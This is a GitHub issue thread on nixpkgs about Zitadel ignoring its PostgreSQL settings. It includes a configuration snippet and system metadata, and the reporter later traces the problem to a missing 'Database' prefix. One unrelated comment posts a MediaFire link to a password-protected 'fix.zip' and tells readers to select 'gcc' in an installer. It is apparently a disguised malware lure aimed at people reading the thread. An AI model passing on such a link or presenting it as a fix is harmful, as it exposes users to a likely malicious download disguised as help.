### ISSUE TITLE
Zitadel options do not work with postgresql

### ISSUE THREAD

**Issue by fionera** [NixOS/nixpkgs#338094]
### Describe the bug
When configuring Zitadel to run with postgresql, it still tries cockroachdb because of the startup script.

### Steps To Reproduce
1. Configure Zitadel with Postgresql Config
2. Apply
3. See crash

### Expected behavior
It should run with postgresql

### Additional context
```
  services.zitadel.settings = {
    Port = 8081;
    postgres = {
      Host = "localhost";
      Port = "5432";
      Database = "zitadel";
      MaxOpenConns = "25";
      MaxConnLifetime = "1h";
      MaxConnIdleTime = "5m";
      User = {
        Username = "zitadel";
        Password = "";
        SSL.Mode = "disable";
      };
      Admin = {
        Username = "postgres";
        Password = "postgres";
        SSL.Mode = "disable";
      };
    };
  };
  ```
  
### Notify maintainers

Sadly there are none

### Metadata
Please run `nix-shell -p nix-info --run "nix-info -m"` and paste the result.

```console
[user@system:~]$ nix-shell -p nix-info --run "nix-info -m"
 - system: `"x86_64-linux"`
 - host os: `Linux 6.6.46, NixOS, 24.05 (Uakari), 24.05pre-git`
 - multi-user?: `yes`
 - sandbox: `yes`
 - version: `nix-env (Nix) 2.18.5`
 - nixpkgs: `/nix/var/nix/profiles/per-user/root/channels/nixos`
```

---

Add a :+1: [reaction] to [issues you find important].

[reaction]: https://github.blog/2016-03-10-add-reactions-to-pull-requests-issues-and-comments/
[issues you find important]: https://github.com/NixOS/nixpkgs/issues?q=is%3Aissue+is%3Aopen+sort%3Areactions-%2B1-desc

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fionera** [comment]
I was missing the "Database" prefix 🤦
